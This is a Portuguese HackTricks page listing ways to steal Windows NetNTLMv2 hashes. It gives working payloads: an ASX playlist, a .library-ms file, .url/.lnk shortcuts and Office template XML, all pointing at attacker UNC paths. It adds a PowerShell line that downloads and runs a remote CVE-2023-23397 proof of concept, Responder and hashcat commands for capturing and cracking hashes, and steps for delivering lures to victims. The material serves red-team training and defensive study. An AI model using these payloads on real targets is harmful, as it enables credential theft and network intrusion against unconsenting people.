HackTricksLocais para roubar NTLM creds
Reading time: 7 minutes
tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao đŹ grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter đŠ @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositĂłrios do github.
Confira todas as Ăłtimas ideias de https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ â desde o download de um microsoft word file online atĂ© a ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and https://github.com/p0dalirius/windows-coerced-authentication-methods
Playlists do Windows Media Player (.ASX/.WAX)
Se conseguir fazer com que um alvo abra ou visualize uma playlist do Windows Media Player que vocĂȘ controla, pode leak NetâNTLMv2 apontando a entrada para um caminho UNC. O WMP tentarĂĄ buscar a mĂdia referenciada via SMB e se autenticarĂĄ implicitamente.
Exemplo de payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Fluxo de coleta e cracking:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Vazamento NTLM de .library-ms embutido em ZIP (CVE-2025-24071/24055)
O Windows Explorer trata de forma insegura arquivos .library-ms quando eles são abertos diretamente de dentro de um arquivo ZIP. Se a definição da library apontar para um caminho UNC remoto (por exemplo, \attacker\share), simplesmente navegar/abrir o .library-ms dentro do ZIP faz com que o Explorer enumere o UNC e emita autenticação NTLM ao atacante. Isso gera um NetNTLMv2 que pode ser quebrado offline ou potencialmente relayed.
Exemplo mĂnimo de .library-ms apontando para um UNC do atacante
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Passos operacionais
- Crie o arquivo .library-ms com o XML acima (defina seu IP/hostname).
- Compacte-o (no Windows: Send to â Compressed (zipped) folder) e entregue o ZIP ao alvo.
- Execute um listener de captura NTLM e aguarde a vĂtima abrir o .library-ms de dentro do ZIP.
Outlook calendar reminder sound path (CVE-2023-23397) â zeroâclick NetâNTLMv2 leak
O Microsoft Outlook for Windows processava a propriedade MAPI estendida PidLidReminderFileParameter em itens de calendĂĄrio. Se essa propriedade apontasse para um UNC path (por exemplo, \attacker\share\alert.wav), o Outlook contataria o SMB share quando o lembrete disparasse, leaking o NetâNTLMv2 do usuĂĄrio sem qualquer clique. Isso foi corrigido em 14 de março de 2023, mas continua altamente relevante para frotas legadas/sem atualizaçÔes e para resposta a incidentes histĂłrica.
Exploração råpida com PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Lado do Listener:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Notas
- A vĂtima sĂł precisa ter o Outlook for Windows em execução quando o lembrete disparar.
- O leak produz NetâNTLMv2 adequado para offline cracking ou relay (nĂŁo passâtheâhash).
.LNK/.URL icon-based zeroâclick NTLM leak (CVEâ2025â50154 â bypass of CVEâ2025â24054)
Windows Explorer exibe Ăcones de atalho automaticamente. Pesquisas recentes mostraram que, mesmo apĂłs o patch da Microsoft de abril de 2025 para atalhos com Ăcone UNC, ainda era possĂvel acionar a autenticação NTLM sem cliques hospedando o alvo do atalho em um caminho UNC e mantendo o Ăcone local (o bypass do patch foi atribuĂdo CVEâ2025â50154). Apenas visualizar a pasta faz com que o Explorer recupere metadados do alvo remoto, emitindo NTLM para o servidor SMB do atacante.
Minimal Internet Shortcut payload (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Atalho de Programa payload (.lnk) via PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Delivery ideas
- Coloque o atalho em um ZIP e faça com que a vĂtima o abra.
- Coloque o atalho em um compartilhamento gravĂĄvel que a vĂtima irĂĄ abrir.
- Combine com outros arquivos isca na mesma pasta para que o Explorer pré-visualize os itens.
Office remote template injection (.docx/.dotm) to coerce NTLM
Documentos do Office podem referenciar um template externo. Se vocĂȘ configurar o template anexado para um caminho UNC, abrir o documento irĂĄ autenticar para SMB.
Minimal DOCX relationship changes (inside word/):
- Edite word/settings.xml e adicione a referĂȘncia do template anexado:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Edite word/_rels/settings.xml.rels e aponte rId1337 para o seu UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Reempacote para .docx e entregue. Inicie seu SMB capture listener e aguarde a abertura.
Para ideias pĂłs-captura sobre relaying ou abuso do NTLM, consulte:
ReferĂȘncias
- HTB Fluffy â ZIP .libraryâms auth leak (CVEâ2025â24071/24055) â GenericWrite â AD CS ESC16 to DA (0xdf)
- HTB: Media â WMP NTLM leak â NTFS junction to webroot RCE â FullPowers + GodPotato to SYSTEM
- Morphisec â 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC â Microsoft mitigates Outlook EoP (CVEâ2023â23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate â Zeroâclick, one NTLM: Microsoft security patch bypass (CVEâ2025â50154)
tip
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao đŹ grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter đŠ @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositĂłrios do github.